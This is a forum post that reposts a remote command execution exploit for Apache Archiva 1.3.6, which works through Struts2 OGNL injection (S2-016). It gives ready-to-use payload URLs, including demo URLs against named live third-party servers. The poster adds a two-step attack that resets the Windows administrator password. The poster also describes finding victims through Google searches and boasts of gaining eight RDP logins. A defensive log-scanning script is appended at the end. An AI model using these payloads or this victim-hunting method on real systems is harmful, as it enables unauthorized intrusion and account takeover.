Maximus Posted February 5, 2014

Apache Archiva 1.3.6 => Remote Command Execution
####################################################################
Author: Kacper
Contact: info[at]devilteam.pl
Home Page: https://devilteam.pl/
####################################################################
Vendor: Archiva - The Build Artifact Repository Manager
Dork: "Apache Archiva \ Browse Repository"

Description:
Apache Archiva uses Apache Struts2: "In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code."
In Apache Archiva the redirect: parameter can be used for OGNL injection.

PoC:
(print devilteam.pl) http://imageshack.com/a/img163/6865/e88n.png
http://127.0.0.1:8080/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}

(execute netstat) http://imageshack.com/a/img843/1662/0r84.png
http://127.0.0.1:8080/archiva/security/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27netstat%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}

Demo:
http://archiva.eionet.eurXpa.eu/security/login.action?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}
http://community.ucs.indiXna.edu:9090/archiva/security/login.action?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27devilteam.pl%27%29,%23w.flush%28%29,%23w.close%28%29}

Cheers:
cxsecurity.com
Bartek (ZUOO)
and all people from devilteam.pl

Reference:
S2-016
https://devilteam.pl/viewtopic.php?p=43506

Since I've posted this anyway, here is what I've tried so far, and it worked:

step 1
/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','echo','net','user','administrator','rstcenter!','>_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

step 2
/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

I haven't automated the process yet, but it goes like this:
search Google for "Apache Archiva login page"
e.g. vulnerable link: Apache Archiva \ Login Page
append step 1 and step 2 from above, in order
e.g.:
step 1
http://maven.5amsolutions.com/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','echo','net','user','administrator','rstcenter!','>_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
step 2
http://maven.5amsolutions.com/archiva/security/login.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd','/C','_.bat'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

explanation: (step 1) creates the file _.bat containing "net user administrator rstcenter!" on the server hosting Apache Archiva; step 2 executes the _.bat file
At 12:00 (well, not exactly :00) I discovered the exploit; at 2:56 I already have 8 RDPs (decent ones). Good luck
P.S. you'll have to struggle a bit, it doesn't work on the first try; I don't know why....
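From the defender's side, an added example (mine, not code from the post, the advisory author or the Archiva project) that scans web-server access-log lines for the S2-016 pattern the post relies on: a Struts 2 `action:`/`redirect:`/`redirectAction:` parameter prefix followed by an OGNL expression. It decodes percent-encoding repeatedly so double-encoded variants are caught too; the log format, IPs and sample requests are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the post). Three requests carry a
# Struts 2 prefix parameter followed by an OGNL expression; the other two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Feb/2014:12:01:13 +0000] "GET /archiva/security/login.action?redirect:${%23w%3d%23context.get(%27x%27)} HTTP/1.1" 200 512
10.0.0.5 - - [05/Feb/2014:12:01:20 +0000] "GET /archiva/security/login.action HTTP/1.1" 200 2048
10.0.0.9 - - [05/Feb/2014:12:02:01 +0000] "GET /archiva/security/login.action?redirectAction:%25{%23w%3d%23context.get(%27x%27)} HTTP/1.1" 200 300
10.0.0.9 - - [05/Feb/2014:12:02:30 +0000] "GET /archiva/security/login.action?action%3A%2524%257B%2523w%253d1%257D HTTP/1.1" 200 300
10.0.0.7 - - [05/Feb/2014:12:03:44 +0000] "GET /archiva/browse/org.example?redirect=/archiva/ HTTP/1.1" 200 9876
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Parameter-name prefixes handled by the Struts 2 DefaultActionMapper (S2-016).
PREFIXES = ("action:", "redirect:", "redirectAction:")
# Markers of an OGNL expression in the decoded value.
OGNL_RE = re.compile(r"[$%]\{|#context|#_memberAccess|ProcessBuilder|getRuntime")


def full_decode(s, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads surface."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_log(text):
    """Return (client_ip, prefix, decoded_expression) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        # Split on '?' ourselves: urlsplit would treat a raw '#' as a fragment.
        _, _, query = m.group("target").partition("?")
        for param in query.split("&"):
            decoded = full_decode(param)
            for prefix in PREFIXES:
                if decoded.startswith(prefix) and OGNL_RE.search(decoded[len(prefix):]):
                    findings.append((client_ip, prefix, decoded[len(prefix):]))
    return findings


if __name__ == "__main__":
    for ip, prefix, expr in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{prefix}\t{expr}")
```

Upgrading Struts to 2.3.15.1 or later (which removes the prefix handling) is the fix; this scan only tells you whether the pattern was already tried against an instance.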